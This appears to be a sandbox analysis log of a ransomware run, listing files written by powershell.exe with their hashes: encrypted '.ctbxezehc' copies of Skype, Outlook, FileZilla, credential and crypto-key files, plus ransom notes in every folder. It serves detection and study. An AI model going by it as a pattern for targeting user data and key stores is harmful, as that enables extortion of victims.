SHA256: 2d41823d2beebf63580ce65e7fee3236e53ad8d89226d511798fe18ebb5780c8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db.ctbxezehc
binary
MD5: 4f9f1275f4dc55bd9cd941534e83af98
SHA256: 448e3f8a2538d4654be5fbd8716b9ba606006e662fc7819f12997a132969d822
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index.ctbxezehc
binary
MD5: 4f2855607b79674cd659283c3af42aed
SHA256: 4d291c0d20602bd57c77ec0e65442bbd7bf1b691cbbff651e2e8d678fcd34cbe
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004.ctbxezehc
binary
MD5: 86f4efd2bd9564ceef067cb1fa244508
SHA256: 5cbd3b42a665e181211f2a2d01d2b24792b4bacfc1e3fc02ada12a9a4f96c526
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003.ctbxezehc
binary
MD5: 0dfb4f5a9b51139262bfb48393d96b7a
SHA256: 12054918774846c86e60fb9e8fa5cbb174c7936220e33712bdf7811ff03c4a63
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002.ctbxezehc
binary
MD5: 7c1f09ec1d1f28963b347c3cf0c7b64d
SHA256: 761b2fdfc7ee1c3dce3fbf55c3496c74373dc796fb2745644edf66c18b7c54e1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001.ctbxezehc
binary
MD5: e42d6fa5b932f038ac40d7832f15faa9
SHA256: f7e2e4637fa7906567f2dc0cc93d1010f1b274bb4fea82603e434652775767ec
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2.ctbxezehc
binary
MD5: 774471eabf55b5aa307ad2b5136177d5
SHA256: baae89ca5e2c5cf6fcce119d634a88ddd30f4a2997abf3341e6ac0579de721e0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0.ctbxezehc
binary
MD5: 6654debcc9a70065bb6414ccde2df143
SHA256: 18bc8ccd2a1fa1db1a79a6332d2b3bbce8c3171624fe4b41c54c33b238f90c7d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1.ctbxezehc
binary
MD5: 587b02f27ad2a720c61808fa513c1ce6
SHA256: a564a6a8a56ad0a86c1a5c1f3d1f5d6424a587ee61619741a7b802d01cfb967a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.ctbxezehc
binary
MD5: 0888b5143793749eb4c2215ff54d5adf
SHA256: 5bd6f1f8c16d401d1186973e96ab0a71cfbe34f16cf4fc0950c1831095ca61a0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Signatures\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b.ctbxezehc
binary
MD5: 974f35c6b5b88d3b3c6bed211602455c
SHA256: 11bbb6b826f07541c0f08cafeb6ff7a8627b0c849009cb6a625bf454c54265b8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\70b9161a-fdec-4cad-9e04-69719330c45e.ctbxezehc
binary
MD5: c9fb8eb694b3fb020716f1ed88caf01b
SHA256: ba64fb227f24beadea462a44e5c810031e3e737bdb3c8e6b79474296223b4049
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred.ctbxezehc
binary
MD5: f9aabc28df989f9a5c3463731d7af740
SHA256: 4e0cc8dd693a3244a475d41866d0b835ad780f224905dbdc7b85dc96cfee91dc
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8.ctbxezehc
binary
MD5: 919758ebefce6263e2f3e52dd476a338
SHA256: 988433b4a922e3a45d03f3679f2adbae603453fbfe1f4e1c5a70e67e29ac8dc4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\70b9161a-fdec-4cad-9e04-69719330c45e
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Proof\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs.ctbxezehc
binary
MD5: c3ded52e9e85a16d123160524785af02
SHA256: 365834e5db5624ad13acbe2a901957c4c037c0f986d292aafc6f1f86c64bdb2d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST.ctbxezehc
binary
MD5: 6a1a6b4eadd590d80f9db795f9fcc607
SHA256: 2dd6a067db77829ad314ae768f0c4a6da47eb1dfae1512f83d2b9867aff13681
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\PowerPoint\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml.ctbxezehc
binary
MD5: fbddd50ac1ad37546835d05647c5a99d
SHA256: eed7061945d13f1344660faee381e0c3406ec562429952b791848624b3d42219
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs.ctbxezehc
binary
MD5: 3b66a9b7ff902d836ad8261d1ac17307
SHA256: a881f39ef7a37d59f744b2d485d97bb6c891d698121b5357fc68dc16a7a1cdfa
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml.ctbxezehc
binary
MD5: 834027b4ef608ab956522c5ff08df3eb
SHA256: 683410c5a50ea5f8dea0c092b633548dbfeb1645cf5bb23af5b33e288f9828ab
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml.ctbxezehc
binary
MD5: b797f3eb9396f4f50b64a04e7108a7cb
SHA256: 693b2ea8f75a3e96cd594980bf42b6cfbe353fc35e235bfa876a11020bd7d083
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat.ctbxezehc
binary
MD5: 501de841f10e5a74644585c527c7dd80
SHA256: 999e8a1c6f5bcff6cba0b46ed29b09be0cbb544291008ae60838e06e113e0741
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl.ctbxezehc
binary
MD5: b5df041a7293f20e4ad761e22d821e3f
SHA256: 4e7aa85243296b5f502980faa3a9152c4092c83ec162a43709a54803bf041c0a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd.ctbxezehc
binary
MD5: 700bd4cebcb3e01c98dc96d1cc0862e6
SHA256: 8aa0c7e1413cf919474d9fcf76e65a64a394efc94c95adefabb8214381449d81
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.ctbxezehc
binary
MD5: 9e8fa299f4ab9eebdd0d32201ecdf076
SHA256: c526983015181812a3a2266471fee57609b8988e94bb49ded33877c2ff1d2097
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat.ctbxezehc
binary
MD5: 8ed4cd0e9fb766e66ad0b411823d16cc
SHA256: e0a4280e698c02fa28be203693f761c3d50a5cf8149c5b6b0cb87462d40659a4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\XLSTART\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: bbe553b52bf1e1413b145440af23945b
SHA256: 43b2c799d66ad1fb8fec8d4bb22ef056d1cca86d08610e280073352bcd2c626d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: 6e69afdd553f8e0bfb2e8ff17e8eebfb
SHA256: 6b212013ce0657339cf86c6d33c74b4dbe4b6f71025886b67abeb8fbf46917d8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: b6c5c951e5da98a7931564af4c00e7be
SHA256: 95592f20a499fbb87e6f923e3950037be326976df0e653881457353dd378617c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: fa12b61a196a436d21e80764bb1de948
SHA256: 2e0c73b8d0337ffb7fdc9449352ac85e9c746267e9c93a95d6062a2dc5317a23
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: 32f8e6a74b6c67796a5df644ff5777e8
SHA256: ccd2d7c77e344dd9748a0e0f4e182335ebb892755f948265dfb82830ec33325b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: f7e4d012ddf1744a84ea1034b453c6f7
SHA256: 6a289cf0cfb64f1a679b4a84fcf0ffabaa8e657c67652cf2af07637440828177
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\AddIns\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Credentials\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3.ctbxezehc
binary
MD5: 586fc9f6b0692d9a5728438a3d44421a
SHA256: a1a964cff6cc341c324e3a8eee87f636c8559bf3aa9e6ca27967f04da1538255
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Media Center Programs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\{E4CE17A7-FC47-4CD1-8FF6-45436C8F45DB}\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml.ctbxezehc
binary
MD5: 2dbfbe483134f02b83ea1a9078ba7c73
SHA256: 0dbc7164288256d2445053e72fea33715c12d73a0557e549d8f2e7291807f9b0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml.ctbxezehc
binary
MD5: b606792f8f4e8d2feb9b80b610c75354
SHA256: 9ce0ef8f3264ec3c4988e2d170e7015e2bd9b63398a9ff1da14b9f9021d28f1b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.ctbxezehc
binary
MD5: 53a4b02583d0f595d47fba3541002375
SHA256: b3aef61a119dc2eabeedf76b2251c6b10452eb4a72f533eacb0c841d9d74f3fc
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.ctbxezehc
binary
MD5: 12312872ad5c23dc589ed6e449087040
SHA256: 4d8f137f5638a59b57abc7c3212ff957b8de3f7661a489f597e230763a912572
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy.ctbxezehc
binary
MD5: c018638a696f57c441e130eef0f942ea
SHA256: d1eb4e1520958526d7c7bf6e1fb440e7de2de5c04dbf11da85a9eda99399c9fe
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log.ctbxezehc
binary
MD5: ce6f71f899a3a425f2e7ee92d442ce83
SHA256: 5f411116a99304fd0888e8c11ff404b994a8c109cc7b390d873b5c4025da8da8
3596
